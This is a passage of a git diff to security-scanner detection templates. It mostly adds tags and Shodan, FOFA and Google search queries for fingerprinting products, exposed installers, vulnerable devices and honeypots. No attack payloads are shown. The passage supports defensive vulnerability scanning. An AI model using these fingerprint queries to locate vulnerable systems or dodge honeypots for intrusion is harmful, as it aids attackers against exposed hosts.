a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index 076ec7b5ac..2ad0574ec8 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzz,rce + tags: fuzz,rce,fuzzing http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index 743eaa51ed..24c8ea6aa5 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: iis,edb + tags: iis,edb,fuzzing http: - raw: diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index 42ed0a2bea..94b59ef383 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: linux,lfi,fuzz + tags: linux,lfi,fuzz,fuzzing http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index 9b67344fe9..f28b352d06 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 341 - tags: fuzz,mdb,asp + tags: fuzz,mdb,asp,fuzzing http: - raw: diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index 4ebddab046..b969caead9 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzz,prestashop + tags: fuzz,prestashop,fuzzing http: - raw: diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml index f3f8054d16..2dae31844e 100644 --- a/http/fuzzing/ssrf-via-proxy.yaml +++ b/http/fuzzing/ssrf-via-proxy.yaml @@ -10,7 +10,7 @@ info: - https://twitter.com/ImoJOnDz/status/1649089777629827072 metadata: max-request: 9 - tags: ssrf,proxy,oast,fuzz + tags: ssrf,proxy,oast,fuzz,fuzzing http: - payloads: diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/valid-gmail-check.yaml index 3aa02ea47d..9b68aeae8c 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/valid-gmail-check.yaml @@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1 - tags: gmail + tags: gmail,fuzzing self-contained: true diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml index e819d0a080..a4d1de95d3 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: waf,fuzz + tags: waf,fuzz,fuzzing http: - raw: diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml index 6298ed031b..a9d52b75f8 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/wordpress-plugins-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 100563 - tags: fuzz,wordpress + tags: fuzz,wordpress,fuzzing http: - raw: diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml index 77ae1d67a0..666c9921eb 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: fuzz,wordpress + tags: fuzz,wordpress,fuzzing http: - raw: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml index 88409cbd3c..8d81dfaae1 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/wordpress-weak-credentials.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-1391 metadata: max-request: 276 - tags: wordpress,default-login,fuzz + tags: wordpress,default-login,fuzz,fuzzing http: - raw: diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml index 9742340fe6..c98f3bd644 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzz + tags: fuzz,fuzzing http: - raw: diff --git a/http/honeypot/citrix-honeypot-detect.yaml b/http/honeypot/citrix-honeypot-detect.yaml index 40df55e52c..32c53d1d81 100644 --- a/http/honeypot/citrix-honeypot-detect.yaml +++ b/http/honeypot/citrix-honeypot-detect.yaml @@ -12,7 +12,11 @@ info: max-request: 1 vendor: citrix product: citrix - shodan-query: http.title:“Citrix Login” + shodan-query: + - http.title:“Citrix Login” + - http.title:“citrix login” + fofa-query: title=“citrix login” + google-query: intitle:“citrix login” tags: citrix,honeypot,ir,cti http: diff --git a/http/honeypot/dionaea-http-honeypot-detect.yaml b/http/honeypot/dionaea-http-honeypot-detect.yaml index 5b2257cce5..56a3ffb612 100644 --- a/http/honeypot/dionaea-http-honeypot-detect.yaml +++ b/http/honeypot/dionaea-http-honeypot-detect.yaml @@ -11,6 +11,7 @@ info: max-request: 1 vendor: dionaea product: http + shodan-query: '"python/3.10 aiohttp/3.8.3" && bad status' tags: dionaea,honeypot,ir,cti http: diff --git a/http/honeypot/snare-honeypot-detect.yaml b/http/honeypot/snare-honeypot-detect.yaml index 95bba8d95f..8e2aab0da5 100644 --- a/http/honeypot/snare-honeypot-detect.yaml +++ b/http/honeypot/snare-honeypot-detect.yaml @@ -12,7 +12,9 @@ info: max-request: 1 vendor: snare product: http - shodan-query: '"Python/3.10 aiohttp/3.8.3" && Bad status' + shodan-query: + - '"Python/3.10 aiohttp/3.8.3" && Bad status' + - '"python/3.10 aiohttp/3.8.3" && bad status' tags: snare,honeypot,ir,cti http: diff --git a/http/honeypot/tpot-honeypot-detect.yaml b/http/honeypot/tpot-honeypot-detect.yaml index 12525a4c18..2a36fbac9e 100644 --- a/http/honeypot/tpot-honeypot-detect.yaml +++ b/http/honeypot/tpot-honeypot-detect.yaml @@ -1,15 +1,16 @@ id: tpot-honeypot-detect -info: - name: T-Pot Honeypot - Detect - author: rxerium - severity: info - description: | - A tpot dashboard has been detected - reference: - - https://github.com/telekom-security/tpotce - tags: tpot,honeypot - +info: + name: T-Pot Honeypot - Detect + author: rxerium + severity: info + description: | + A tpot dashboard has been detected + reference: + - https://github.com/telekom-security/tpotce + metadata: + max-request: 1 + tags: tpot,honeypot http: - method: GET path: diff --git a/http/iot/kyocera-printer-panel.yaml b/http/iot/kyocera-printer-panel.yaml index 01c55020bd..4154910605 100644 --- a/http/iot/kyocera-printer-panel.yaml +++ b/http/iot/kyocera-printer-panel.yaml @@ -10,6 +10,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-50306417 + product: d-copia253mf_plus_firmware + vendor: kyocera + fofa-query: icon_hash=-50306417 tags: iot,panel,kyocera,printer http: diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 4aabb1a762..a98d7c2e91 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -10,9 +10,9 @@ info: - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md - https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md metadata: - fofa-query: title=="Netgear" verified: true max-request: 1 + fofa-query: title=="Netgear" tags: rce,netgear,iot http: diff --git a/http/miscellaneous/balada-injector-malware.yaml b/http/miscellaneous/balada-injector-malware.yaml index 43ee22e663..ba19eb97f1 100644 --- a/http/miscellaneous/balada-injector-malware.yaml +++ b/http/miscellaneous/balada-injector-malware.yaml @@ -10,7 +10,7 @@ info: - https://blog.sucuri.net/2024/01/thousands-of-sites-with-popup-builder-compromised-by-balada-injector.html metadata: max-request: 1 - tags: malware,balada,misc + tags: malware,balada,misc,miscellaneous http: - method: GET diff --git a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml index df7dba47b2..b6c6c97fe4 100644 --- a/http/miscellaneous/cloudflare-rocketloader-htmli.yaml +++ b/http/miscellaneous/cloudflare-rocketloader-htmli.yaml @@ -13,7 +13,7 @@ info: metadata: verified: true max-request: 1 - tags: misconfig,cloudflare,htmli + tags: misconfig,cloudflare,htmli,miscellaneous http: - method: GET diff --git a/http/miscellaneous/defacement-detect.yaml b/http/miscellaneous/defacement-detect.yaml index 6d5b6f29c0..21e86e8742 100644 --- a/http/miscellaneous/defacement-detect.yaml +++ b/http/miscellaneous/defacement-detect.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 85 - tags: misc,defacement,spam,hacktivism,fuzz + tags: misc,defacement,spam,hacktivism,fuzz,miscellaneous http: - method: GET diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index e2671e4087..c90cd5c0a5 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -12,8 +12,9 @@ info: reference: - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information - https://portswigger.net/kb/issues/00600100_directory-listing - tags: misc,generic,misconfig,fuzz - + metadata: + max-request: 2 + tags: misc,generic,misconfig,fuzz,miscellaneous flow: | function target_is_in_scope(url) { if (url.startsWith(template.http_1_host) || url.startsWith("/")) { diff --git a/http/miscellaneous/form-detection.yaml b/http/miscellaneous/form-detection.yaml index 4c4b623cc2..ef7b6883c5 100644 --- a/http/miscellaneous/form-detection.yaml +++ b/http/miscellaneous/form-detection.yaml @@ -8,7 +8,9 @@ info: A template to detect HTML Forms in page response. reference: - https://github.com/dirtycoder0124/formcrawler - tags: form,misc + metadata: + max-request: 1 + tags: form,misc,miscellaneous http: - method: GET diff --git a/http/miscellaneous/microsoft-azure-error.yaml b/http/miscellaneous/microsoft-azure-error.yaml index 6bf4c412b4..69532bad79 100644 --- a/http/miscellaneous/microsoft-azure-error.yaml +++ b/http/miscellaneous/microsoft-azure-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: title:"Microsoft Azure Web App - Error 404" - tags: error,azure,microsoft,misc,takeover + tags: error,azure,microsoft,misc,takeover,miscellaneous http: - method: GET diff --git a/http/misconfiguration/aws/cdn-cache-poisoning.yaml b/http/misconfiguration/aws/cdn-cache-poisoning.yaml index 667d221e50..fb46c4fa0c 100644 --- a/http/misconfiguration/aws/cdn-cache-poisoning.yaml +++ b/http/misconfiguration/aws/cdn-cache-poisoning.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: X-Amz-Server-Side-Encryption - tags: cache,aws,poisoning,cdn + tags: cache,aws,poisoning,cdn,misconfig variables: string: "{{to_lower(rand_base(8))}}={{to_lower(rand_base(8))}}" diff --git a/http/misconfiguration/corebos-htaccess.yaml b/http/misconfiguration/corebos-htaccess.yaml index 14cdbfe1f8..51043592a1 100644 --- a/http/misconfiguration/corebos-htaccess.yaml +++ b/http/misconfiguration/corebos-htaccess.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 1 shodan-query: http.html:"corebos" + product: corebos + vendor: corebos + fofa-query: body="corebos" tags: exposure,corebos,huntr,misconfig http: diff --git a/http/misconfiguration/dlink-unauth-cgi-script.yaml b/http/misconfiguration/dlink-unauth-cgi-script.yaml index adb7b7392c..90559be330 100644 --- a/http/misconfiguration/dlink-unauth-cgi-script.yaml +++ b/http/misconfiguration/dlink-unauth-cgi-script.yaml @@ -10,7 +10,8 @@ info: - https://github.com/netsecfish/info_cgi metadata: verified: true - fofa-query: app="D_Link-DNS" + max-request: 1 + fofa-query: "app=\"D_Link-DNS\"" tags: unauth,dlink,misconfig http: diff --git a/http/misconfiguration/dont-panic-traceback.yaml b/http/misconfiguration/dont-panic-traceback.yaml index e973ef835a..57fd9e0872 100644 --- a/http/misconfiguration/dont-panic-traceback.yaml +++ b/http/misconfiguration/dont-panic-traceback.yaml @@ -7,8 +7,8 @@ info: description: | DON'T PANIC Traceback was detected. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Debugger" tags: traceback,dont-panic,misconfig diff --git a/http/misconfiguration/doris-dashboard.yaml b/http/misconfiguration/doris-dashboard.yaml index ad10be723e..825e6f44ac 100644 --- a/http/misconfiguration/doris-dashboard.yaml +++ b/http/misconfiguration/doris-dashboard.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:24048806 - tags: doris,exposure,unauth,logs + tags: doris,exposure,unauth,logs,misconfig http: - method: GET diff --git a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml index 393936b11f..9e5b928dec 100644 --- a/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml +++ b/http/misconfiguration/drupal/drupal-user-enum-ajax.yaml @@ -6,7 +6,11 @@ info: severity: info metadata: max-request: 4 - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" + product: drupal + vendor: drupal tags: drupal,misconfig http: diff --git a/http/misconfiguration/filebrowser-unauth.yaml b/http/misconfiguration/filebrowser-unauth.yaml index 0a9996e7f7..234f519c40 100644 --- a/http/misconfiguration/filebrowser-unauth.yaml +++ b/http/misconfiguration/filebrowser-unauth.yaml @@ -11,6 +11,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:1052926265 + product: filebrowser + vendor: filebrowser + fofa-query: icon_hash=1052926265 tags: misconfig,filebrowser,unauth http: diff --git a/http/misconfiguration/genieacs-default-jwt.yaml b/http/misconfiguration/genieacs-default-jwt.yaml index e423a75f66..ba430084e2 100644 --- a/http/misconfiguration/genieacs-default-jwt.yaml +++ b/http/misconfiguration/genieacs-default-jwt.yaml @@ -16,7 +16,12 @@ info: max-request: 1 vendor: genieacs product: genieacs - shodan-query: http.html:"genieacs" + shodan-query: + - http.html:"genieacs" + - http.favicon.hash:-2098066288 + fofa-query: + - body="genieacs" + - icon_hash=-2098066288 tags: misconfig,jwt,genieacs,default-jwt variables: cookie_name: genieacs-ui-jwt diff --git a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml index 3335edb0c3..92d13c0fe3 100644 --- a/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml +++ b/http/misconfiguration/h2o/h2o-arbitary-file-read.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"H2O Flow" - tags: h2o-3,h2o,info-leak,lfi + tags: h2o-3,h2o,info-leak,lfi,misconfig http: - raw: diff --git a/http/misconfiguration/https-to-http-redirect.yaml b/http/misconfiguration/https-to-http-redirect.yaml index 5419f82670..d3e4368b5e 100644 --- a/http/misconfiguration/https-to-http-redirect.yaml +++ b/http/misconfiguration/https-to-http-redirect.yaml @@ -7,8 +7,8 @@ info: description: | Detects whether there is a redirect from https:// to http:// metadata: - max-request: 1 verified: true + max-request: 1 tags: misconfig,http,https http: diff --git a/http/misconfiguration/imgproxy-unauth.yaml b/http/misconfiguration/imgproxy-unauth.yaml index 5983e67f77..a6fca7798c 100644 --- a/http/misconfiguration/imgproxy-unauth.yaml +++ b/http/misconfiguration/imgproxy-unauth.yaml @@ -1,23 +1,22 @@ id: imgproxy-unauth -info: - name: Imgproxy Unauthorized Access - author: userdehghani - severity: low - description: | - imgproxy is a fast and secure standalone server for resizing, processing, and converting images. - remediation: set IMGPROXY_SECRET environment variable. - reference: - - https://docs.imgproxy.net/configuration/options - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - metadata: - verified: true - max-request: 1 - shodan-query: html:"imgproxy" - tags: imgproxy,unauth,misconfig - +info: + name: Imgproxy Unauthorized Access + author: userdehghani + severity: low + description: | + imgproxy is a fast and secure standalone server for resizing, processing, and converting images. + remediation: set IMGPROXY_SECRET environment variable. + reference: + - https://docs.imgproxy.net/configuration/options + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + metadata: + verified: true + max-request: 1 + shodan-query: html:"imgproxy" + tags: imgproxy,unauth,misconfig variables: img_url: 'https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Google_2015_logo.svg/375px-Google_2015_logo.svg.png' diff --git a/http/misconfiguration/installer/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml index 734fee7e5b..c774464177 100644 --- a/http/misconfiguration/installer/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -7,7 +7,11 @@ info: description: Drupal Install panel exposed. metadata: max-request: 2 - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" + product: drupal + vendor: drupal tags: misconfig,drupal,install,exposure http: diff --git a/http/misconfiguration/installer/eyoucms-installer.yaml b/http/misconfiguration/installer/eyoucms-installer.yaml index 137206ec8e..a1eb96e603 100644 --- a/http/misconfiguration/installer/eyoucms-installer.yaml +++ b/http/misconfiguration/installer/eyoucms-installer.yaml @@ -9,6 +9,8 @@ info: verified: true max-request: 1 fofa-query: title="eyoucms" + product: eyoucms + vendor: eyoucms tags: misconfig,eyoucms,install http: diff --git a/http/misconfiguration/installer/gibbon-installer.yaml b/http/misconfiguration/installer/gibbon-installer.yaml index 7712fd4c97..42fcfede47 100644 --- a/http/misconfiguration/installer/gibbon-installer.yaml +++ b/http/misconfiguration/installer/gibbon-installer.yaml @@ -9,6 +9,9 @@ info: verified: true max-request: 1 fofa-query: icon_hash="-165631681" + product: gibbon + vendor: gibbonedu + shodan-query: http.favicon.hash:"-165631681" tags: misconfig,gibbon,install,exposure http: diff --git a/http/misconfiguration/installer/ids-skills-installer.yaml b/http/misconfiguration/installer/ids-skills-installer.yaml index 0751655fde..affa7b1e01 100644 --- a/http/misconfiguration/installer/ids-skills-installer.yaml +++ b/http/misconfiguration/installer/ids-skills-installer.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"IDP Skills Installer" - tags: install,ids,exposure + tags: install,ids,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/installer/trilium-notes-installer.yaml b/http/misconfiguration/installer/trilium-notes-installer.yaml index 1fbdd2c816..34668b6e91 100644 --- a/http/misconfiguration/installer/trilium-notes-installer.yaml +++ b/http/misconfiguration/installer/trilium-notes-installer.yaml @@ -7,7 +7,8 @@ info: description: | Detects if the Trilium Notes setup page is accessible. metadata: - shodan-query: html:"Trilium Notes" + max-request: 1 + shodan-query: "html:\"Trilium Notes\"" tags: trilium,setup,misconfig,installer http: diff --git a/http/misconfiguration/installer/zabbix-installer.yaml b/http/misconfiguration/installer/zabbix-installer.yaml index 3eee94ddcd..92831ebb02 100644 --- a/http/misconfiguration/installer/zabbix-installer.yaml +++ b/http/misconfiguration/installer/zabbix-installer.yaml @@ -8,7 +8,17 @@ info: metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:892542951 + shodan-query: + - http.favicon.hash:892542951 + - http.title:"zabbix-server" + - cpe:"cpe:2.3:a:zabbix:zabbix" + product: zabbix + vendor: zabbix + fofa-query: + - icon_hash=892542951 + - app="zabbix-监控系统" && body="saml" + - title="zabbix-server" + google-query: intitle:"zabbix-server" tags: misconfig,zabbix,install,exposure http: diff --git a/http/misconfiguration/intelbras-dvr-unauth.yaml b/http/misconfiguration/intelbras-dvr-unauth.yaml index 8ae6290609..251e22e15d 100644 --- a/http/misconfiguration/intelbras-dvr-unauth.yaml +++ b/http/misconfiguration/intelbras-dvr-unauth.yaml @@ -10,7 +10,8 @@ info: - https://github.com/netsecfish/intelbras_cap_js metadata: verified: true - fofa-query: body="Intelbras" + max-request: 1 + fofa-query: "body=\"Intelbras\"" tags: unauth,intelbras,dvr,misconfig http: diff --git a/http/misconfiguration/mlflow-unauth.yaml b/http/misconfiguration/mlflow-unauth.yaml index 8a4b68fe84..d8590910d7 100644 --- a/http/misconfiguration/mlflow-unauth.yaml +++ b/http/misconfiguration/mlflow-unauth.yaml @@ -11,6 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.title:"mlflow" + product: mlflow + vendor: lfprojects + fofa-query: + - app="mlflow" + - title="mlflow" + google-query: intitle:"mlflow" tags: unauth,mlflow,oss,misconfig http: diff --git a/http/misconfiguration/node-express-dev-env.yaml b/http/misconfiguration/node-express-dev-env.yaml index 580dc440b4..e5c79d4ac6 100644 --- a/http/misconfiguration/node-express-dev-env.yaml +++ b/http/misconfiguration/node-express-dev-env.yaml @@ -10,11 +10,10 @@ info: - https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/express-development-mode-is-enabled/ - https://www.synopsys.com/blogs/software-security/nodejs-mean-stack-vulnerabilities.html metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: "X-Powered-By: Express" tags: nodejs,express,misconfig,devops,cicd,trace - flow: http(1) && http(2) http: diff --git a/http/misconfiguration/php/php-composer-binary.yaml b/http/misconfiguration/php/php-composer-binary.yaml index 53ff3e953d..f6467767c7 100644 --- a/http/misconfiguration/php/php-composer-binary.yaml +++ b/http/misconfiguration/php/php-composer-binary.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: php,composer,exposure + tags: php,composer,exposure,misconfig http: - method: GET diff --git a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml index 0010b5b742..cb72e96164 100644 --- a/http/misconfiguration/sap/sap-netweaver-info-leak.yaml +++ b/http/misconfiguration/sap/sap-netweaver-info-leak.yaml @@ -11,6 +11,9 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 + product: content_server + vendor: sap + fofa-query: icon_hash=-266008933 tags: sap,misconfig http: diff --git a/http/misconfiguration/thanos-prometheus-exposure.yaml b/http/misconfiguration/thanos-prometheus-exposure.yaml index a77007e609..3862ffe8ed 100644 --- a/http/misconfiguration/thanos-prometheus-exposure.yaml +++ b/http/misconfiguration/thanos-prometheus-exposure.yaml @@ -9,7 +9,7 @@ info: max-request: 1 shodan-query: title:"Thanos | Highly available Prometheus setup" fofa-query: icon_hash="29632872" - tags: thanos,prometheus,exposure,setup + tags: thanos,prometheus,exposure,setup,misconfig http: - method: GET diff --git a/http/misconfiguration/unigui-server-monitor-exposure.yaml b/http/misconfiguration/unigui-server-monitor-exposure.yaml index ff0d6eee1f..8def1f6c80 100644 --- a/http/misconfiguration/unigui-server-monitor-exposure.yaml +++ b/http/misconfiguration/unigui-server-monitor-exposure.yaml @@ -1,20 +1,20 @@ id: unigui-server-monitor-exposure -info: - name: UniGUI Server Monitor Panel - Exposure - author: serrapa - severity: low - description: | - Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. - reference: - - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm - metadata: - verified: true - max-request: 1 - shodan-query: title:"uniGUI" - fofa-query: title="uniGUI" - tags: exposure,unigui,misconfig - +info: + name: UniGUI Server Monitor Panel - Exposure + author: serrapa + severity: low + description: | + Detects exposed UniGUI Server Monitor Panels which could reveal sensitive server statistics, users sessions, licensing information and others data. + reference: + - https://www.unigui.com/doc/online_help/using-server-monitor-(server-c.htm + metadata: + verified: true + max-request: 1 + shodan-query: title:"uniGUI" + fofa-query: title="uniGUI" + tags: exposure,unigui,misconfig + http: - method: GET path: diff --git a/http/osint/user-enumeration/piratebay.yaml b/http/osint/user-enumeration/piratebay.yaml index b30047584c..f9eff9ee7f 100644 --- a/http/osint/user-enumeration/piratebay.yaml +++ b/http/osint/user-enumeration/piratebay.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: osint,osint-p2p,piratebay + tags: osint,osint-p2p,piratebay,headless self-contained: true diff --git a/http/takeovers/worksites-takeover.yaml b/http/takeovers/worksites-takeover.yaml index 2b067146e8..8affdd7150 100644 --- a/http/takeovers/worksites-takeover.yaml +++ b/http/takeovers/worksites-takeover.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 2 - tags: takeover + tags: takeover,dns dns: - name: "{{FQDN}}" diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index 47afbcc440..29af3cc441 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -9,10 +9,10 @@ info: reference: - https://answer.apache.org/ metadata: - shodan-query: http.favicon.hash:523757057 - fofa-query: icon_hash="523757057" verified: true max-request: 1 + shodan-query: http.favicon.hash:523757057 + fofa-query: icon_hash="523757057" tags: detect,tech,apache http: diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml index c1d58959c9..75833041d5 100644 --- a/http/technologies/apache/tomcat-detect.yaml +++ b/http/technologies/apache/tomcat-detect.yaml @@ -4,15 +4,22 @@ info: name: Tomcat Detection author: philippedelteil,dhiyaneshDk,AdamCrosser severity: info - description: If an Tomcat instance is deployed on the target URL, when we send a - request for a non existent resource we receive a Tomcat error page with version. + description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. classification: cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" + google-query: intitle:"apache tomcat" tags: tech,tomcat,apache,intrusive http: diff --git a/http/technologies/arcgis-rest-api.yaml b/http/technologies/arcgis-rest-api.yaml index 826ea043f3..d946ef6c7f 100644 --- a/http/technologies/arcgis-rest-api.yaml +++ b/http/technologies/arcgis-rest-api.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: esri product: arcgis_engine - tags: api,arcgis,cms,tech + tags: api,arcgis,cms,tech,esri http: - method: GET diff --git a/http/technologies/arcgis-tokens.yaml b/http/technologies/arcgis-tokens.yaml index 4f0e54c77a..362f22e5a5 100644 --- a/http/technologies/arcgis-tokens.yaml +++ b/http/technologies/arcgis-tokens.yaml @@ -14,8 +14,12 @@ info: max-request: 1 vendor: esri product: arcgis_server - shodan-query: title:"ArcGIS" - tags: tech,arcgis,tokens,detect + shodan-query: + - title:"ArcGIS" + - http.title:"arcgis" + fofa-query: title="arcgis" + google-query: intitle:"arcgis" + tags: tech,arcgis,tokens,detect,esri http: - method: GET diff --git a/http/technologies/boa-web-server.yaml b/http/technologies/boa-web-server.yaml index 53c893383c..a18acd11b2 100644 --- a/http/technologies/boa-web-server.yaml +++ b/http/technologies/boa-web-server.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - shodan-query: "Server: Boa/" verified: true max-request: 1 + shodan-query: "Server: Boa/" tags: boa,tech http: diff --git a/http/technologies/celebrus-detect.yaml b/http/technologies/celebrus-detect.yaml index 2b06b610ab..ebf2295bc9 100644 --- a/http/technologies/celebrus-detect.yaml +++ b/http/technologies/celebrus-detect.yaml @@ -1,19 +1,19 @@ id: celebrus-detect -info: - name: Celebrus - Detect - author: righettod - severity: info - description: | - Celebrus was detected. - reference: - - https://investors.celebrus.com/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"Celebrus" - tags: tech,celebrus,detect - +info: + name: Celebrus - Detect + author: righettod + severity: info + description: | + Celebrus was detected. + reference: + - https://investors.celebrus.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Celebrus" + tags: tech,celebrus,detect + http: - method: GET path: diff --git a/http/technologies/citrix-xenmobile-version.yaml b/http/technologies/citrix-xenmobile-version.yaml index 75a1af605d..20bcfdd879 100644 --- a/http/technologies/citrix-xenmobile-version.yaml +++ b/http/technologies/citrix-xenmobile-version.yaml @@ -8,8 +8,8 @@ info: Template for XenMobile-detection (even if login-page is deactivated) and the specific version and rolling patch from js/app/init.js endpoint metadata: verified: true - max-request: 1 - shodan-query: title:"XenMobile - Console" + max-request: 2 + shodan-query: "title:\"XenMobile - Console\"" tags: tech,edb,citrix,version,detect flow: http(1) && http(2) diff --git a/http/technologies/confluence-detect.yaml b/http/technologies/confluence-detect.yaml index dca5852e6f..4c587d6fb6 100644 --- a/http/technologies/confluence-detect.yaml +++ b/http/technologies/confluence-detect.yaml @@ -12,7 +12,9 @@ info: max-request: 5 vendor: atlassian product: confluence_server - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" category: productivity tags: tech,confluence,atlassian,detect diff --git a/http/technologies/cowboy-detect.yaml 